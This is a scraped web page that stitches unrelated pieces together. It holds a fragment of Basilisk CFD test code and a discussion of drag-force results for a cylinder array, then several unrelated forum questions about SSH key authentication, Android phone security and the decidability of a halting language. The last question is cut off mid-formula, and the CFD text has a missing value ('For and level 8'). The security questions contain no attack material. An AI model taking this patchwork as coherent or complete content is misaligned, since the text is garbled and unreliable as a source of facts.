maxlevel++; #if 0 refine (level < maxlevel); #else adapt_wavelet ({cs,u}, (double[]){1e-2,2e-6,2e-6}, maxlevel); #endif cylinder (cs, fs); } }
The non-dimensional drag force per unit length closely matches the results of Sangani & Acrivos. For and level 8 there is only about 6 grid points in the width of the gap between cylinders.
Non-dimensional drag force per unit length
This can be further quantified by plotting the relative error. It seems that at low volume fractions, the error is independent from the mesh refinement. This may be due to other sources of errors, such as the splitting error in the projection scheme. This needs to be explored further.
Relative error on the drag force
The adaptive mesh for 9 levels of refinement illustrates the automatic refinement of the narrow gap between cylinders.
Adaptive mesh at level 9. | http://basilisk.fr/src/test/cylinders.c | CC-MAIN-2018-43 | refinedweb | 591 | 64.71 |
: Brian Paul <brianp@...>
> OK, here's what I've found. It's basically a version problem between
> the DRM code that's in the DRI trunk vs the 2.4.0 kernel.
>
> Evidently the DRM code on the DRI trunk was updated for kernel 2.4.3
> and that broke compatibility with 2.4.[012].
>
> This was probably announced on the mailing list, but I must have missed it.
>
> Here's a description of the problem. When compiling radeon_drv.c there
> are some warnings:
[snip]
> Alan (or anyone more familiar with kernel stuff), is this an acceptable
> patch?
This will break for 2.4.2-ac22 through -ac28 now ... I upgraded from
-ac17 to -ac28 to get the kernel module to build and work :)
AFAIK (I will check) I need the -ac series to have the AGP stuff work
reliably with my ALi 1541 chipset ...
/me goes away to bang head on desk ...
> -Brian
--
/* Bill Crawford, Unix Systems Developer, Ebone (formerly GTS Netcom) */
#include <stddiscl>
const char *addresses[] = {
"bill@...", "Bill.Crawford@...", // work
"billc@...", "bill@..." // home
}; | https://sourceforge.net/p/dri/mailman/message/12631022/ | CC-MAIN-2018-09 | refinedweb | 175 | 76.82 |
I've recently started learning swift and sprite kit. i am currently trying to do the basics and was trying to fit a background image on to the screen. i have managed to get the background picture up and in the centre of the screen but it is not filling up the whole screen. all help would be appreciated.
import SpriteKit
class GameScene: SKScene {
override func didMoveToView(view: SKView) {
/* Setup your scene here */
let bgImage = SKSpriteNode(imageNamed: "background.png")
bgImage.position = CGPoint(x:self.size.width/2, y: self.size.height/2)
bgImage.anchorPoint = CGPointMake(0.5, 0.5)
bgImage.zPosition = -1
self.addChild(bgImage)
You can change the size of your sprite to fit the size the scene
bgImage.size = self.size
Of course if the proportions of the scene are different from the proportions of the sprite, the sprite will be stretched.
Thank you to @Knight0fDragon for the helpful comments below. | https://codedump.io/share/F4mDETTTjNlL/1/swift-spritekit-background-image | CC-MAIN-2016-50 | refinedweb | 153 | 66.64 |
0
Hi there,
Im trying to create a simple program that creates an 2D array of numbers and prints them to the screen via a function. I think i have got most of the way however, I cant seem to get the print function to print correctly. It's been a while since i coded in C. Can anyone see where i have slipped up?
#include <stdio.h> #include <stdlib.h> #define START 0 #define MAX 128 void printarray(int *,int); int main(int argc, char *argv[]) { int i,j,c; int vig[MAX][MAX]; for(i=0;i<MAX;i++) { c=START+i; for(j=0;j<MAX;j++) { if(c<MAX) /* This section is a simple loop that initiates a Vigenère Table */ { /* into an array called "vig". This array will be used in the */ vig[i][j]=c; /* encryption/decryption process later on. */ c++; } else { c=START; vig[i][j]=c; c++; } } } printarray(&vig[0][0], MAX); system("PAUSE"); fclose(input); return 0; } void printarray(int *vig1,int n) { int i,j,x; int vig2[MAX][MAX]; vig1=&vig2[MAX][MAX]; for(i=0;i<MAX;i++) { for(j=0;j<MAX;j++) { printf(" %d,",vig2[i][j]); } printf(" \n"); } }
Also I couldn't remember how to pass the array to the function without having to assign the pointer to a new array :
vig1=&vig2[MAX][MAX];
I didn't think you had to do this but cant get it to pass it in any other way.
Thanks for your time.
Craig | https://www.daniweb.com/programming/software-development/threads/62571/nice-easy-one-for-you-all-passing-arrays-to-functions-in-c | CC-MAIN-2017-09 | refinedweb | 254 | 66.88 |
current position:Home>Python web crawler - Fundamentals (1)
Python web crawler - Fundamentals (1)
2022-01-30 19:03:43 【FizzH】
「 This is my participation 11 The fourth of the yuegengwen challenge 1 God , Check out the activity details :2021 One last more challenge 」
Basic principles of reptiles
1. Web page request process
(1)Request, Every web page displayed in front of us must go through this step , That is, send an access request to the server . stay python Need to import requests modular :
import requests Copy code
(2)Response, After the server receives the user request , Will verify the validity of the request , Then send the content of the response to the user ; The user accepts the content of the server response , Show the content , This is the familiar Web request .
2. The way of web page request
(1)GET: The most common way , It is generally used to obtain or query resource information , The parameters are set at URL in .
(2)POST: adopt request body Pass parameters , The information that can send a request is much larger than GET The way .
2.1 use GET To grab data
The following is used Get Try to grab the home page of nuggets , The code is as follows :
import requests url = '' strhtml = requests.get(url) print(strhtml.text) Copy code
The results are as follows :
The following article will add HTML Relevant knowledge .
2.2 Use POST To grab data
Continue to use the Nuggets homepage to try , Press F12 Enter developer mode , stand-alone “NETWORK” tab ,
That's ok , Rollover , There's no need to use the Nuggets home page , Try to find a translation website .
Search for nuggets on the translation website , Pictured , You can see that the request method is POST
First , take Headers Medium URL Copy it , And assign it to url, The code is as follows :
url = "" Copy code
POST The way to request data is different from GET,GET Can pass URL Pass parameters , and POST Parameters need to be placed in the request entity .
take FORM DATA Make a dictionary of the request parameters , Next use requests.post() Method to request form data , The code is as follows :
import requests response = requests.post(url,data = Form_data) Copy code
Convert data in string format to JSON Formatted data , And extract the data according to the data structure , Print out the translation results , The code is as follows .
import json content = json.loads(response.text) print(content['translateResult'][0][0]['tgt']) Copy code
The acquisition and response of web pages are written here , If you have a better way , Please share !
author[FizzH] | https://en.pythonmana.com/2022/01/202201301903411628.html | CC-MAIN-2022-27 | refinedweb | 437 | 50.6 |
/*PS: This topic has something to do with Java graphics as well*/
Hi,
I'm working on a star map (graphics program), the final output of the program is similar to:
These are the steps i follow:
Step 1
Write a method to convert between star coordinate system to the Java picture coordinate system.
The star coordinate system has (0,0) in the center, and −1 and 1 as the extremes.
The Java graphics coordinate system has (0,0) as the top-left corner, and positive numbers extend down and right up to the screen size.
---->diagram:
Step 2
Read the contents of the star-data.txt file, and plot the stars on a Java graphics window. Use a black background, and plot the stars as white circles.
Step 3Step 3Quote:
star-data.txt contains info on 3,526 stars, this number appears on the first line of the file.
Subsequent lines has the following fields:
-x, y coordinates for stars (in star coordinate system, e.g. 0.512379, 0.020508)
- Henry Draper number (just a unique identifer for the star)
-magnitude (or brightness of star)
-names of some stars. A star may have several names.
Vary the size of the circles to reflect their magnitude. Since brighter stars have smaller magnitude values, you will need to calculate the circle radius, say, 10/(magnitude + 2).
Step 4
Read from all files in constellation folder, and plot them on top of the stars.
Each file contains pairs of star names that make up lines in the constellation.
I have already done Steps 1 - 3.
I'm using files :
-StarApp.java as my application class that has main() method
-StarJFrame.java ,this class creates the window & defines its properties & behavior
-StarJPanel.java ---> heres the code, for this class, below
-Star.java -----> heres the code, for this class, below
Code :
[B]StarJPanel.java[/B] import java.awt.*; import javax.swing.*; import java.awt.event.*; import java.util.Scanner; public class StarJPanel extends JPanel implements ActionListener { private Star[] stars; private Timer timer; public StarJPanel() { setBackground(Color.black); timer = new Timer(5, this); stars = getArrayOfStars(); timer.start(); } private Star[] getArrayOfStars() { // This method reads the Stars data from a file and stores it in the stars array. int howMany = Integer.parseInt(Keyboard.readInput()); Star[] stars = new Star[howMany]; for (int i = 0; i < stars.length; i++) { String input = Keyboard.readInput(); Scanner fields = new Scanner(input); double x = Double.parseDouble(fields.next()); double y = Double.parseDouble(fields.next()); int draper = Integer.parseInt(fields.next()); double magnitude = Double.parseDouble(fields.next()); String namesString = ""; String[] names = {}; if (fields.hasNext()) { namesString = fields.nextLine(); names = namesString.trim().split("; "); } stars[i] = new Star(x, y, draper, magnitude, names); } return stars; } public void actionPerformed(ActionEvent e) { repaint(); } public void paintComponent(Graphics g) { super.paintComponent(g); for(int i = 0; i < stars.length; i++) { stars[i].coordinateToPixel(stars[i].getX(), stars[i].getY()); stars[i].drawStar(g); } } }
Code :
[B]Star.java[/B] import java.awt.*; import javax.swing.*; public class Star { private double x, y; // coordinates of star private int draper; // Henry Draper number (unique identifier) private double magnitude; // Magnitude (brightness) of star private String[] names; // Star name(s) - not always present private int newX; private int newY; private int size; public Star( double x, double y, int draper, double magnitude, String[] names ) { this.x = x; this.y = y; this.draper = draper; this.magnitude = magnitude; this.names = names; size = (int)(10/(magnitude + 2)); } public void coordinateToPixel(double x, double y) { newX = (int) ( (x + 1) * 350); newY = (int) ( (y - 1) * -350); } public void drawStar(Graphics g) { g.setColor(Color.white); g.drawOval( newX, newY, size, size); } public int getNumberOfNames() { return names.length; } public double getX() { return x; } public double getY() { return y; } }
As you can see I have done:
Step 1: in Star class, with method: coordinateToPixel(double x, double y)
Step 2: in StarJPanel class with method: private Star[] getArrayOfStars()
(PS: I'm also using Keyboard class to read lines from the stars.txtfile)
Step 3: in Star class, with method: drawStar(Graphics g), where size = (int)(10/(magnitude + 2));
Please tell me if I have done 3 steps without confusing & incoherent code, I guess I have written the code differently from what ppl write. Somehow thats how we were taught to write. For me, my way gets a bit confusing sometimes!!
Now I'm left stuck with Step 4.
I have a folder where all my StarApp, StarJPanel, etc files are & a folder called Constellation
Inside constellation folder I have files that contain pairs of star names that make up lines in the constellation.
--Heres the constellation folder & star-data.txt file:
Constellations & star-data.rar
Although I'm thinkin i can use below code to read contents in files & use g.drawLine somewhere in StarJPanel. But I'm not sure how to find same names of stars in constellation files with names in the already set array from star-data & then join the coordinates with g.drawLine ???
Code :
import java.io.*; public class reader { public static void main(String args[]) throws Exception { FileReader fr = new FileReader("Constellation/...."); /** Don't know what to put in ....... **/ BufferedReader br = new BufferedReader(fr); String s; while((s = br.readLine()) != null) { System.out.println(s); } fr.close(); } }
Not sure how Step 4 is done please guide me. :)
By the way, I'm using textpad as my editor & complier.
So I have to go: Tools > Run in parameters i put: StarApp < star-data.txt inorder to load the Stars into screen. | http://www.javaprogrammingforums.com/%20file-i-o-other-i-o-streams/3327-how-read-all-files-directory-plot-contents-printingthethread.html | CC-MAIN-2014-10 | refinedweb | 913 | 59.3 |
Servlets are one of the most popular ways to develop Web applications today. Many of the best-known Web sites on the Internet are powered by servlets. In this chapter, I give you just the basics: what a servlet is, how to set up your computer so you can code and test servlets, and how to create a simple servlet. The next two chapters build on this chapter with additional Web programming techniques. URL to request a document that's located on the server computer. HTTP uses a request/response model, which means that client computers (Web users) send request messages to HTTP servers, which in turn send response messages back to the clients.
A basic HTTP interaction works something like this:
In some cases, you actually type in the URL of the address. But most of the time, you click a link that specifies the URL.
The request includes the name of the file that you want to retrieve.
The most important thing to note about normal Web interactions is that they are static. By that I mean that the contents of the file sent to the user is always the same. If the user requests the same file 20 times in a row, the same page displays 20 times.
In contrast, a servlet provides a way for the content to be dynamic. A servlet is simply a Java program that extends the javax.servlet.Servlet class. The Servlet class enables the program to run on a Web server in response to a user request, and output from the servlet is sent back to the Web user as an HTML page.
With servlets, Steps 1, 2, and 4 of the preceding procedure are the same. It's the fateful third step that sets servlets apart. If the URL specified by the user refers to a servlet rather than a file, Step 3 goes more like this:
In other words, instead of sending the contents of a file, the server sends the output generated by the servlet program. Typically, the servlet program generates some HTML that's displayed by the browser.
Servlets are designed to get their work done quickly, and then end. Each time a servlet runs, it processes one request from a browser, generates one page that's sent back to the browser, and then ends. The next time that user or any other user requests the same servlet, the servlet is run again.
Unfortunately,:
You find the Zip file on the Apache Web site. Although Apache also offers an executable setup file for installing Tomcat, I suggest you download the Zip file instead.: omcat.Javajdk1.6.0.
For example, if your JDF is installed in c:Program FilesJava jdk1.6.0, copy this file to c:Program FilesJavajdk1.6.0 jrelibext.You find the servlet-api.jar file in c: omcat commonlib, assuming you extracted the Tomcat files to c: omcat.
The context.xml file is located in c: omcatconf. The second line is initially this:
Change it to:
Like context.xml, the web.xml file is located in c: omcatconf.:
Simply remove the first () and last (–>) of these lines.
The second group looks like this:
Once again, you must remove the first and last lines so these lines aren't treated as comments.
By default, Tomcat looks for the class files for your servlets in the directory c: omcatwebappsROOTWEB-INFclasses. Unfortunately, the classes directory is missing. So you must navigate to c: omcat webappsROOTWEB-INF and create the classes directory. (Of course, the c:tomcat part of these paths varies if you installed Tomcat in some other location.)
After you install and configure Tomcat, you can start it by opening a command window, changing to the c: omcatin: omcatin.
Okay, enough of the configuration stuff; now you can start writing some code. The following sections go over the basics of creating a simple Hello, World! type servlet.
Most servlets need access to at least three packages-javax.servlet, javax.servlet.http, and java.io. As a result, you usually start with these import statements:
import java.io.*; import javax.servlet.*; import javax.servlet.http.*;
Depending on what other processing your servlet does, you may need additional import statements.
To create a servlet, you write a class that extends the HttpServlet class. Table 2-1 lists six methods you can override in your servlet class.
Most servlets override at least the doGet method. This method is called by the servlet engine when a user requests the servlet by typing its address into the browser's address bar or by clicking a link that leads to the servlet.
Two parameters are passed to the doGet method:
One of the main jobs of most servlets is writing HTML output that's sent back to the user's browser. To do that, you first call the getWriter method of the HttpServletResponse class. This returns a PrintWriter object that's connected to the response object. Thus you can use the familiar print and println methods to write HTML text.
For example, here's a doGet method for a simple HelloWorld servlet:
public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { PrintWriter out = response.getWriter(); out.println("Hello, World!"); }
Here the PrintWriter object returned by response.getWriter() is used to send a simple text string back to the browser. If you run this servlet, the browser displays the text Hello, World!.
In most cases, you don't want to send simple text back to the browser. Instead, you want to send formatted HTML. To do that, you must first tell the response object that the output is in HTML format. You can do that by calling the setContentType method, passing the string “text/html” as the parameter. Then you can use the PrintWriter object to send HTML. For example, Listing 2-1 shows a basic HelloWorld servlet that sends an HTML response.
Listing 2-1: The HelloWorld Servlet
import java.io.*; import javax.servlet.*; import javax.servlet.http.*; import java.util.*; public class HelloWorld extends HttpServlet { public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { response.setContentType("text/html"); PrintWriter out = response.getWriter(); out.println("
"); out.println(""); out.println("HelloWorld"); out.println(""); out.println("
"); out.println("
"); out.println(""); } }
Here the following HTML is sent to the browser (I added indentation to show the HTML's structure):
HelloWorld
When run, the HelloWorld servlet produces the page shown in Figure 2-3.
Figure 2-3: The HelloWorld servlet displayed in a browser.
, ,,,
So how exactly do you run a servlet? First, you must move the compiled class file into a directory that Tomcat can run the servlet from. For testing purposes, you can move the servlet's class file to c: omcatwebapps ROOTWEB-INFclasses. Then type an address like this one in your browser's address bar:
You may also want to override the doPost method. This method is called if the user requests your servlet from a form. In many cases, you'll just call doGet from the doPost method, so that both get and post requests are processed in the same way.
As you know, the doGet method is called whenever the user enters the address of your servlet in the address bar or clicks a link that leads to your servlet. But many-if not most-servlets are associated with HTML forms, which provide fields the user can enter data into. The normal way to send form data from the browser to the server is with an HTTP POST request, not a GET request.
If you want a servlet to respond to POST requests, you can override the doPost method instead of, or in addition to, the doGet method. Other than the method name, doPost has the same signature as doGet. In fact, it's not uncommon to see servlets in which the doPost method simply calls doGet, so that both POST and GET requests are processed identically. To do that, code the doPost method like this:
public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { doGet(request, response); }
The HelloWorld servlet that is shown earlier in Listing 2-1 isn't very interesting because it always sends the same text. Essentially, it's a static servlet-which pretty much defeats the purpose of using servlets in the first place. You could just as easily have provided a static HTML page.
Listing 2-2 shows the code for a more dynamic HelloWorld servlet. This version randomly displays one of six different greetings. It uses the random method of the Math class to pick a random number from 1 to 6, and then uses this number to decide which greeting to display. It also overrides the doPost method as well as the doGet method, so posts and gets are handled identically.
Listing 2-2: The HelloServlet Servlet
import java.io.*; import javax.servlet.*; import javax.servlet.http.*; import java.util.*; public class HelloServlet extends HttpServlet { public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { response.setContentType("text/html"); PrintWriter out = response.getWriter(); String msg = getGreeting(); out.println("
"); out.println(""); out.println( "HelloWorld Servlet"); out.println(""); out.println(""); out.println("
"); out.println(""); out.println(""); } public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { doGet(request, response); } private String getGreeting() { String msg = ""; int rand = (int)(Math.random() * (6)) + 1; switch (rand) { case 1: return "Hello, World!"; case 2: return "Greetings!"; case 3: return "Felicitations!"; case 4: return "Yo, Dude!"; case 5: return "Whasssuuuup?"; case 6: return "Hark!"; } return null; } }
If a servlet is called by an HTTP GET or POST request that came from a form, you can call the getParameter method of the request object to get the values entered by the user into each form field. Here's an example:
String name = request.getParameter("name");
Here the value entered into the form input field named name is retrieved and assigned to the String variable name.
As you can see, retrieving data entered by the user in a servlet is easy. The hard part is creating a form that the user can enter the data into. There are two basic approaches to doing that. One is to create the form using a separate HTML file. For example, Listing 2-3 shows an HTML file named InputServlet.html that displays the form shown in Figure 2-4.
Figure 2-4: A simple input form.
Listing 2-3: The InputServlet.html File
Input Servlet
Enter your name:
The action attribute in the form tag of this form specifies that /servlet/InputServlet is called when the form is submitted, and the method attribute indicates that the form is submitted via a POST rather than a GET request.
The form itself consists of an input text field named name and a Submit button. Nothing fancy-just enough to get some text from the user and send it to a servlet.
Listing 2-4 shows a servlet that can retrieve the data from the form shown in Listing 2-3.
Listing 2-4: The InputServlet Servlet
import java.io.*; import javax.servlet.*; import javax.servlet.http.*; public class InputServlet extends HttpServlet { public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { String name = request.getParameter("Name"); response.setContentType("text/html"); PrintWriter out = response.getWriter(); out.println("
"); out.println(""); out.println("Input Servlet"); out.println(""); out.println(""); out.println("
"); out.println(""); out.println(""); } public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { doGet(request, response); } }
As you can see, this servlet really isn't that much different than the first HelloWorld servlet from Listing 2-1. The biggest difference is that it retrieves the value entered by the user into the name field and uses it in the HTML that's sent to the response PrintWriter object. For example, if the user enters Calvin Coolidge into the name input field, the following HTML is generated:
HelloWorld
Thus the message Hello Calvin Coolidge is displayed on the page.
Although real-life servlets do a lot more than just parrot back information entered by the user, most of them follow this surprisingly simple structure, with a few variations of course. For example, real-world servlets validate input data and display error messages if the user enters incorrect data or omits important data. And most real-world servlets retrieve or update data in files or databases. Even so, the basic structure is pretty much the same.
When you develop servlets, you often want to access other classes you've created, such as I/O classes that retrieve data from files or databases, utility or helper classes that provide common functions such as data validation, and perhaps even classes that represent business objects such as customers or products. To do that, all you have to do is save the class files in the classes directory of the servlet's home directory that, for the purposes of this chapter, is c: omcatwebappsROOTWEB-INFclasses.
To illustrate a servlet that uses several classes, Figure 2-5 shows the output from a servlet that lists movies read from a text file. This servlet uses three classes:
Figure 2-5: The ListMovies servlet.
The code for the Movie class is shown in Listing 2-5. As you can see, this class doesn't have much: It defines three public fields (title, year, and price) and a constructor that lets you create a new Movie object and initialize the three fields. Note that the price field isn't used by this servlet.
Listing 2-5: The Movie Class
public class Movie { public String title; public int year; public double price; public Movie(String title, int year, double price) { this.title = title; this.year = year; this.price = price; } }
Listing 2-6 shows the MovieIO class. This class uses the file I/O features that are presented in Book VIII, Chapter 2 to read data from a text file. The text file uses tabs to separate the fields, and contains these lines:
It's a Wonderful
19461946
14.95 The Great Race14.95 The Great Race
19651965
12.95 Young Frankenstein12.95 Young Frankenstein
19741974
16.95 The Return of the Pink Panther16.95 The Return of the Pink Panther
19751975
11.95 Star Wars11.95 Star Wars
19771977
17.95 The Princess Bride17.95 The Princess Bride
19871987
16.95 Glory16.95 Glory
19891989
14.95 Apollo 1314.95 Apollo 13
19951995
19.95 The Game19.95 The Game
19971997
14.95 The Lord of the Rings:The Fellowship of the Ring14.95 The Lord of the Rings:The Fellowship of the Ring
20012001
19.9519.95
Here the arrows represent tab characters in the file. I'm not going to go over the details of this class here, except to point out that getMovies is the only public method in the class, and it's static so you don't have to create an instance of the MovieIO class to use it. For the details on how this class works, refer to Book VIII, Chapter 2.
Listing 2-6: The MovieIO Class); } } }
Listing 2-7 shows the code for the ListMovie servlet class.
Listing 2-7: The ListMovie Servlet Class
import java.io.*; import javax.servlet.*; import javax.servlet.http.*; import java.util.*; public class ListMovies extends HttpServlet { public void doGet(HttpServletRequest request, →8 HttpServletResponse response) throws IOException, ServletException { response.setContentType("text/html"); PrintWriter out = response.getWriter(); String msg = getMovieList(); out.println("
"); out.println(""); out.println( "List Movies Servlet"); out.println(""); out.println(""); out.println("
"); out.println("
"); out.println(""); out.println(""); } public void doPost(HttpServletRequest request, → 28 HttpServletResponse response) throws IOException, ServletException { doGet(request, response); } private String getMovieList() → 35 { String msg = ""; ArrayList movies = MovieIO.getMovies(); for (Movie m : movies) { msg += m.year + ": "; msg += m.title + "
"; } return msg; } }
The following paragraphs describe what each of its methods do:
Open table as spreadsheet
Book I - Java Basics
Book II - Programming Basics
Book III - Object-Oriented Programming
Book IV - Strings, Arrays, and Collections
Book V - Programming Techniques
Book VI - Swing
Book VII - Web Programming
Book VIII - Files and Databases
Book IX - Fun and Games | https://flylib.com/books/en/2.706.1/creating_servlets.html | CC-MAIN-2019-04 | refinedweb | 2,668 | 65.12 |
Complete the steps described in the rest of this page, and in about fifteen minutes you'll have created a Google Chat bot that sends messages to a Google Chat room. This quickstart uses a simple Python script that sends HTTP requests to an incoming webhook registered to a Google Chat room.
Prerequisites
To run this quickstart, you need:
- Python 2.6 or greater.
- A Google account.
- An existing Google Chat room.
Run the following command to install the library using pip:
pip install httplib2:
Python
from json import dumps from httplib2 import Http def main(): """Hangouts Chat incoming webhook quickstart.""" url = '<INCOMING-WEBHOOK-URL>' bot_message = { 'text' : 'Hello from. | https://developers-dot-devsite-v2-prod.appspot.com/hangouts/chat/quickstart/incoming-bot-python | CC-MAIN-2021-10 | refinedweb | 109 | 75.1 |
Description:
Arduino GSM Project: Security Alert message to multiple numbers-In this tutorial, you will learn how to make an Advanced security system and send the Security Alert message to multiple numbers using Arduino and A GSM Sim900A Module. For the demonstration purposes, I will be using an LDR, which makes this project as the laser security system, but if you want you can also replace the LDR with a PIR sensor or Magnetic reed switch Sensor or a limit switch and so on. You can also use multiple sensors.
This is basically the 2nd version of the GSM laser security system in which I used the LDR sensor for the intruder detection and I used the same GSM sim900A module. in this project, the security alert message is only sent to one number. If you want to watch this Tutorial.
But in many situations, we need to send the same security alert message to multiple numbers. So this tutorial is all about how to write a very simple program and how to connect all the components together to make the advanced security system. In this tutorial, we will cover
- GSM SIM900A module Pinout explanation
- Complete Circuit Diagram
- Arduino GSM project Programming and finally
- Testing
Without any further delay, let’s get started!!!
For the step by step explanation watch Video tutorial given in the end.
Amazon Links.
Other Tools and Components:
Super Starter kit for Beginners
PCB small portable drill machines
*Please Note: These are affiliate links. I may make a commission if you buy the components through these links. I would appreciate your support in this way!
GSM SIM900A module pinout:
Arduino GSM Project: Security Alert message to multiple numbers
This is the GSM sim900A module, in the market, we have different types of GSM modules, the one I will be using today is GSM sim900A if you want you can also use any other gsm module, like for example sim900D. I have also tested the same programming using sim900D but with a different baud rate, the rest of the program remains the same. If you want to study more about the GSM Sim900A module then read my article “GSM sim900A Complete Guide“ an lm317t adjustable variable voltage regulator, I have a very detailed tutorial on lm317t explaining everything. If in case you want to watch this tutorial.
As you can see clearly in the picture above this module has so many pins that GSM Project Circuit Diagram:
This schematic is designed in Cadesoft eagle 9.1.0 version, if you want to learn how to make schematics and PCB’s then you watch my tutorial.
Tx of the sim900A is connected with pin number 7 of the Arduino, the Rx pin of the sim900A module is connected with pin number 8 of Arduino, and GND is connected with the Arduino’s ground. a power supply is connected with the sim900A module ideal voltage is 4.7v to 5v as already explained.
An LDR is connected in series with a 10k resistor which makes a voltage divider circuit. As you know an LDR is basically a variable resistor, whose resistance changes with the amount of light falling on the LDR. So a change in resistance will result in a change in voltage. This change in voltage can be monitored using the analog pin A1 of the Arduino.
GSM Sim900A Module Interfacing with Arduino:
All the components are interfaced as per the circuit diagram, this is the LDR circuit, as you can see an LDR is connected in series with a 10k resistor. A wire from the middle of the LDR and 10k resistor is connected with the analog pin A1 of the Arduino.
The GSM sim900A module Txd and Rxd pins are connected with the Arduino pin number 7 and pin number 8, and make sure you connected the ground of the gsm module with the ground of the Arduino. This GSM module will be powered up using this Regulated 5v power supply. Now let’s discuss the Arduino Programming.
Arduino GSM Project Programming:
Arduino GSM Project: Security Alert message to multiple numbers
For the step by step program explanation watch video tutorial given at the end.
Watch Video Tutorial:
Arduino GSM Project: How to send Security Alert message to multiple numbers using gsm module
Other GSM-based Projects:
How to use GSM and Bluetooth Together To monitor Any Sensors wirelessly using Arduino
RFID & GSM based student Attendance Alert message to parents
Request Temperature Data Using GSM and Arduino
Arduino and Gsm based laser security system
Car accident location tracking using GSM, GPS, and Arduino
GSM Alarm System Using Arduino and a PIR Sensor
Arduino Gas leakage detection and SMS alert MQ-2 sensor
RFID based students attendance system with message Alert
4 Comments
Hello 🙂
I need Your help.
I saw Your code about multiple sms send and I created this program code:
#define sensor 7
#include <SoftwareSerial.h>
SoftwareSerial SIM800(11, 12); // gsm module connected here
String textForSMS;
// cell numbers to which you want to send the security alert message
String f1001 = “+48694377xxx”;
String f1002 = “+48509168xxx”;
void setup() {
randomSeed(analogRead(0));
Serial.begin(9600);
SIM800.begin(9600); // original 19200. while enter 9600 for sim900A
Serial.println(” logging time completed!”);
pinMode(sensor, INPUT_PULLUP);
delay(5000); // wait for 5 seconds
}
void loop() {
{
textForSMS = “\nIntruder detected”;
//sendSMS(textForSMS);
sendsms(textForSMS, f1001); // you can use a variable of the type String
Serial.println(textForSMS);
Serial.println(“message sent.”);
delay(5000);
sendsms(“Intruder Detected!!!!!!!!!”, f1002); // you can also write any message that you want to send.
Serial.println(textForSMS);
Serial.println(“message sent.”);
delay(5000);
}
}
But it’s not working, please tell my why? I use module SIM800L:
On serial port monitor I see every command from program arduion.
Please help me with this, and answer for email 🙂
Thank You very much.
Hello i make this project it’s working fine but i have problems when PIR sensor is High sms send continuous pls help me
i do the same program but it is not working is there any error?
there is no error, it’s fully tested. You can watch my video tutorial as well. | https://www.electroniclinic.com/arduino-gsm-project-security-alert-message-to-multiple-numbers/ | CC-MAIN-2021-39 | refinedweb | 1,024 | 58.62 |
Add Dynamic Pages
Welcome to the fourth article in the getting started with Prismic and Gatsby tutorial series. We'll be walking through the steps required to convert the content from the repeatable pages and look at: /about and /more-info. These pages use the same Slices that the homepage, so we will re-use the same Slice Zone, code components, and Slice fragment queries.
The models for this Page already exist in your Prismic repository. Click on Custom Types, and select the Page type to see the content modeling of the Slice Zone. Then, click the Documents button and choose one Page to view the live version of the page.
The only difference between the Page vs. the Homepage model is that we exclude the banner and add a UID field, a URL-friendly unique ID that we will use to determine our pages' URLs.
⚠️ No need to modify the Custom Types
You do not need to change anything in the Custom Types of your repository. However, if you wish to change anything, we highly recommend you wait until the end of this step-by-step tutorial and read the dedicated plugin configuration article.
Run the project with npm start. Open the GraphQL Playground at and paste the following GraphQL query in the top section, and the example id value of a document in the Query variables section,
See how we're using the Union type to help us specify the fields we need from a Slice. In this example, we're going to retrieve the Quote Slice in our Custom Type to check that everything is working:
- Query variable
- GraphQL query
{ "id": "f155697f-382a-527c-9af7-d030178be1e4" }
query PageQuery($id: String) { prismicPage(id: {eq: $id}) { data { body { ... on PrismicPageDataBodyQuote { slice_type primary { quote { text } } } } } } }
Run the query by pressing the "play" button ▷ at the top; it'll show you the query results on the right.
There are some important things to note here:
- The Page's Custom Type is repeatable, so we need to query the documents based on the URL visited. That's why we need the $id variable in the query. Read more: Query basics.
- In the GraphiQL explorer, you need to specify the id variable value. This is generated automatically during the site build in your project.
Let's now programmatically create pages from data.
Before creating the page template, delete the 〜/src/pages/about.js and 〜/src/pages/more-info.js files.
⚠️ Don't skip this step
If you skip this step, you'll end up with errors in the next step.
We will use the File System Route API to generate pages for the Page type. First, create a new in the {PrismicPage.url}.js file inside the 〜/src/pages folder and paste the following code. This filename uses the nodes from the page query to create dynamic routes using the URLs defined in your Link Resolver.
// {PrismicPage.url}.js file import * as React from 'react' import { graphql } from 'gatsby' import { SliceZone } from '@prismicio/react' import { Layout } from '../components/Layout' import { Seo } from '../components/Seo' import { components } from '../slices' const PageTemplate = ({ data }) => { if (!data) return null const doc = data.prismicPage.data return ( <Layout> <Seo title={doc.document_display_name.text} /> <SliceZone slices={doc.body} components={components} /> </Layout> ) } export const query = graphql` query PageQuery($id: String) { prismicPage(id: { eq: $id }) { data { document_display_name { text } body { ... on PrismicSliceType { slice_type } ...PageDataBodyText ...PageDataBodyQuote ...PageDataBodyFullWidthImage ...PageDataBodyImageGallery ...PageDataBodyImageHighlight } } } } ` export default PageTemplate
Now, stop the current Gatsby server by pressing Ctrl + C. Relaunch your server by running npm start. When the build is complete, you'll see that the /about and /more-Info pages now pull their content entirely from Prismic!
Next up, we will be updating the project to have the ability to control the top navigation from Prismic.
Was this article helpful?
Can't find what you're looking for? Get in touch with us on our Community Forum. | https://prismic.io/docs/technologies/tutorial-4-add-dynamic-pages-gatsby | CC-MAIN-2022-05 | refinedweb | 647 | 65.83 |
I understand the logical steps of asymmetric key cryptography as it relates to TLS, however, I’ve started using Git and in a bid to avoid having to use a password for authentication, I’ve set up ssh keys for passwordless authentication. I understand that these ssh keys are complements of each other but I do not understand how the actual authentication is taking place. I’ve copied the public key to Git and stored the private key locally. As such, I am able to do what I set out to do (passwordless authentication) but I do not know the underlying steps as to why the authentication is successful. I’ve tried searching the web but every answer I’ve found thus far has been too high level in that they did not specify the steps. For example, were I looking for the TLS steps, I’d expect something along the lines of: Check cert of https page (server) – Grab public key and encrypt secret with it – Securely send secret to server which should be the only entity with the corresponding private key to decrypt – Server and client now switch over to encrypted communications using the, now, shared secret.
Tag: steps
Steps to take to ensure Android security? [closed]
I am aware that I should keep android up to date and have an anti virus like MalwareBytes. I also use VPN for connections. What other steps should I take to secure my android phone?
In addition, how can I check which apps are transmitting data?
(I also scan apps using the Play Protect).
If this question has already been answered in detail, could you link to it please?
Is $nHALT$ undecidable even if $M$ halts on input $w$ in finite steps
If we have the language
